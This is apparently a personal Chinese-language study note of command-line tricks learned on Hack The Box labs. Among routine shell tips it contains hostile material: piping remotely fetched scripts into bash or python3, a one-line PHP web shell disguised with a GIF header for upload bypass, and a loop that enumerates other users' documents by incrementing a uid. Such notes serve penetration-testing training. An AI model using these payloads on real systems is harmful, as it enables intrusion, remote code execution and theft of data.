HTB渗透学习-学到的酷方法

一些酷酷的方法

快速查看配置文件中设置了哪些东西

cat /etc/ssh/sshd_config | grep -v "#" | sed -r '/^\s*$/d'

  • cat读取文件
  • grep的-v表示反向匹配,这段指过滤掉所有包含#的行
  • sed -r表示启用正则表达式,’/^\s*$/d’表示匹配空白行并删除,^表示行的开始,\s*表示匹配零个或多个空白字符,$表示行的结束,d是删除命令。

快速文件后加一行

echo "10.129.204.85 app.inlanefreight.local" | tee -a /etc/hosts

  • tee用于将输出同时写入文件和标准输出

Linux下载脚本后直接执行,实现不往盘里写文件的脚本运行

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

  • 使用管道符

快速进行base64编解码

echo 'nihao' | base64

echo 'bmloYW8K' | base64 -d

快速制作一张GIF马

echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

快速枚举文件下载地址

假设现有一个网页documents.php,其点击链接可以下载内容,Render后的HTML页面是这样的,每个页面有一个Invoice和一个Report:

1
2
<li class='pure-tree_link'><a href='/documents/Invoice_3_06_2020.pdf' target='_blank'>Invoice</a></li>
<li class='pure-tree_link'><a href='/documents/Report_3_01_2020.pdf' target='_blank'>Report</a></li>

使用CURL下载后,可以通过唯一指定标识进行grep定位
curl -s "http://SERVER_IP:PORT/documents.php?uid=1" | grep "<li class='pure-tree_link'>"

  • Invoice
  • Report

    • 进一步,使用正则定位pdf文件的内容
    curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep -oP "\/documents.*?.pdf"

    /documents/Invoice_3_06_2020.pdf
    /documents/Report_3_01_2020.pdf

    最后使用for循环遍历所有uid,获取所有页面的链接

    1
    2
    3
    4
    5
    6
    7
    8
    9
    #!/bin/bash

    url="http://SERVER_IP:PORT"

    for i in {1..10}; do
            for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?.pdf"); do
                    wget -q $url/$link
            done
    done

    POST的话,可以使用curl -X POST来指定请求方式

    快速生成字典

    以1-10的base64后md5为例
    for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done

    • echo -n 用于不在echo后添加换行符
    • base64 -w 0 用于不在base64后添加换行符